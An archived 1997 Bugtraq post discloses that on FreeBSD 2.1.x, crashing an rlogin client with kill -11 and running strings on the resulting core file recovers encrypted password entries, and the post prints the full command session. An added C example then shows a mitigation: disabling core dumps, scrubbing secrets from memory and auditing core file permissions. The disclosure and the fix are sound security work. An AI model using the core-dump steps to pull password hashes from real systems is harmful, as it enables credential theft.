Bugtraq mailing list archives
FreeBSD,rlogin and coredumps.
From: roelof () CUBE NANOTEQ CO ZA (Roelof W Temmingh)
Date: Mon, 17 Feb 1997 01:34:06 +0200
---------- Forwarded message ----------

If the following is already known, my deepest apologies for the junk mail..

RECONSTRUCT PARTS OF UN-SHADOWED PASSWORDFILE ON (at least) FreeBSD 2.1.0,2.1.5:

Bronc Buster wrote:
This exploit is very similar to the FTP exploit on BSD that creates a ftp.core file you can then strings and get the encrypted password file.
....snip...snip..

I tried this technique on my FreeBSD 2.1.0 box. It didn't work. I started playing around with dump files:

~> rlogin 127.0.0.1
Password:
Last login: Mon Feb 17 00:35:49 from localhost
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 2.1.0-RELEASE (WIPS) #0: Thu Oct 17 03:37:25 SAT 1996
You have new mail.
~> ps -ax | grep rlogin
 6528 ?? S 0:00.06 rlogind
 6527 p1 S+ 0:00.05 rlogin 127.0.0.1
 6529 p1 S+ 0:00.01 rlogin 127.0.0.1
~> kill -11 6529
~> ls
Brain_Box NS cronjobs mail security
Mail News foon rlogin.core
~>strings rlogin.core > unshadowed.passwdfile.reconstruct
~>vi unshadowed.passwdfile.reconstruct
and reconstruct..

I also tried this on a FreeBSD 2.1.5 box, and it did the same thing. I wonder if there is a way to make a core dump only readable by root, and why this isn't the default?

=========================================================================
Roelof W Temmingh          Network & Data Security
Nanoteq                    rt () nanoteq com [w]
South-Africa               roelof () cube nanoteq co za [ah]
http://www.nanoteq.com
=========================================================================
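Added example, not part of the original post and not FreeBSD's own code: a general POSIX mitigation for the leak described above, in which a program that holds password hashes in memory sets RLIMIT_CORE to zero before loading them and scrubs the buffer afterwards, plus a small audit check for core files readable by group or others. The function names and the sample values are assumptions made for illustration.

```c
/* Added example (not from the original post): a program that holds password
 * hashes in memory turns off core dumps before loading them. */
#include <stdio.h>
#include <sys/resource.h>
#include <sys/stat.h>

/* Set the soft and hard RLIMIT_CORE to 0 so a fatal signal (the post uses
 * kill -11) produces no core file. An unprivileged process cannot raise the
 * hard limit again. Returns 0 on success, -1 on failure. */
int disable_core_dumps(void)
{
    struct rlimit rl;
    rl.rlim_cur = 0;
    rl.rlim_max = 0;
    if (setrlimit(RLIMIT_CORE, &rl) != 0 || getrlimit(RLIMIT_CORE, &rl) != 0)
        return -1;
    return (rl.rlim_cur == 0 && rl.rlim_max == 0) ? 0 : -1;
}

/* Overwrite a secret once it is no longer needed; the volatile pointer keeps
 * the compiler from optimizing the stores away. */
void scrub(void *buf, size_t len)
{
    volatile unsigned char *p = buf;
    while (len--)
        *p++ = 0;
}

/* Audit helper (hypothetical name): 1 if the file at path is readable by
 * group or others, 0 if it is not, -1 if it cannot be examined. */
int core_is_exposed(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & (S_IRGRP | S_IROTH)) ? 1 : 0;
}

int main(void)
{
    char hash[] = "constructed-sample-hash";   /* constructed sample value */
    if (disable_core_dumps() != 0) {
        perror("setrlimit(RLIMIT_CORE)");
        return 1;
    }
    /* ... the secret would be used here ... */
    scrub(hash, sizeof hash);
    printf("rlogin.core exposed: %d\n", core_is_exposed("rlogin.core"));
    return 0;
}
```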